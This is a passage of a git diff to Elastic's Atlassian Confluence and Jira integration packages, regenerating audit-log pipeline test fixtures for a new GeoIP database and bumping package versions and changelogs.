added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":520000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5049,20 +4743,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5070,7 +4758,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045211452Z", + "ingested": "2021-12-14T14:34:52.859170630Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":522000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5151,20 +4839,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5172,7 +4854,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045213116Z", + "ingested": "2021-12-14T14:34:52.859170984Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":525000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5247,20 +4929,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5268,7 +4944,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045214798Z", + "ingested": "2021-12-14T14:34:52.859171356Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5349,20 +5025,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5370,7 +5040,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045216596Z", + "ingested": "2021-12-14T14:34:52.859171779Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":529000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5451,20 +5121,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5472,7 +5136,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045218276Z", + "ingested": "2021-12-14T14:34:52.859172218Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":532000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5493,6 +5157,7 @@ ] }, { + "@timestamp": "2021-11-22T23:43:22.615Z", "confluence": { "audit": { "method": "System", @@ -5513,7 +5178,6 @@ ] } }, - "@timestamp": "2021-11-22T23:43:22.615Z", "ecs": { "version": "1.12.0" }, 
@@ -5527,7 +5191,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-08T15:09:09.045219932Z", + "ingested": "2021-12-14T14:34:52.859172580Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"System\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":615000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5599,20 +5263,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5620,7 +5278,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045221617Z", + "ingested": "2021-12-14T14:34:52.859172937Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"57\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 57\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:43:22.615Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624653,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5687,20 +5345,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5708,7 +5360,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045223290Z", + "ingested": "2021-12-14T14:34:52.859173297Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:44:13.873Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 58\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-22T23:47:20.782708Z;\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"58\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624840,\"nano\":815000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5766,20 +5418,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5787,7 +5433,7 @@ }, "event": { "action": "audit.logging.summary.global.settings.edited", - "ingested": "2021-12-08T15:09:09.045224962Z", + "ingested": "2021-12-14T14:34:52.859173657Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Global settings changed\",\"actionI18nKey\":\"audit.logging.summary.global.settings.edited\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global Administration\",\"categoryI18nKey\":\"audit.logging.category.admin\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Custom contact admin message\",\"key\":\"Custom contact admin message\",\"to\":\"Please enter information about your request for the site administrators. If you are reporting an error please be sure you include information on what you were doing and the time the problem occurred.\"},{\"from\":\"Confluence\",\"i18nKey\":\"Site title\",\"key\":\"Site title\",\"to\":\"Confluence Test\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624990,\"nano\":382000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5870,20 +5516,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5891,7 +5531,7 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-08T15:09:09.045226651Z", + "ingested": "2021-12-14T14:34:52.859174030Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"Another User\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"Another User\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"another.user@example.como\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"another.user\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":842000000},\"version\":\"1.0\"}", "type": [ "user", @@ -5966,20 +5606,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5987,7 +5621,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045228322Z", + "ingested": "2021-12-14T14:34:52.859174383Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":966000000},\"version\":\"1.0\"}", "type": [ "group", @@ -6061,20 +5695,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6082,7 +5710,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045229993Z", + "ingested": "2021-12-14T14:34:52.859174751Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625032,\"nano\":205000000},\"version\":\"1.0\"}", "type": [ "group", @@ -6162,20 +5790,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6183,7 +5805,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:09:09.045231674Z", + "ingested": "2021-12-14T14:34:52.859175135Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"63\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 63\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:50:32.205Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625035,\"nano\":770000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_confluence/manifest.yml b/packages/atlassian_confluence/manifest.yml index 9a59aee2d1a..6497ffe47d7 100644 --- a/packages/atlassian_confluence/manifest.yml +++ b/packages/atlassian_confluence/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_confluence title: Atlassian Confluence -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Confluence with Elastic Agent. type: integration diff --git a/packages/atlassian_jira/_dev/deploy/docker/files/config.yml b/packages/atlassian_jira/_dev/deploy/docker/files/config.yml index 0a4d89e405a..95e091754ad 100644 --- a/packages/atlassian_jira/_dev/deploy/docker/files/config.yml 
+++ b/packages/atlassian_jira/_dev/deploy/docker/files/config.yml 
@@ -22,4 +22,4 @@ rules: responses: - status_code: 200 body: |- - {"entities":[{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]},{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 
2021-11-22T00:34:23.154Z"}]}],"pagingInfo":{"nextPageOffset":0,"nextPageCursor":"1637539714166,47","nextPageLink":"http://{{ hostname }}:{{ env "PORT" }}/rest/auditing/1.0/events?offset=0&limit=2&pageCursor=1637539714166,47","lastPage":false,"size":2}} + {"entities":[{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]},{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results 
returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]}],"pagingInfo":{"nextPageOffset":0,"nextPageCursor":"1637539714166,47","nextPageLink":"http://{{ hostname }}:{{ env "PORT" }}/rest/auditing/1.0/events?offset=0&limit=2&pageCursor=1637539714166,47","lastPage":false,"size":2}} diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml index e894d124588..b1ba3f43908 100644 --- a/packages/atlassian_jira/changelog.yml +++ b/packages/atlassian_jira/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log index 171fe495c95..2f3d21750a3 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log 
@@ -1,5 +1,5 @@ -{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]} -{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"55.6.73.144","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 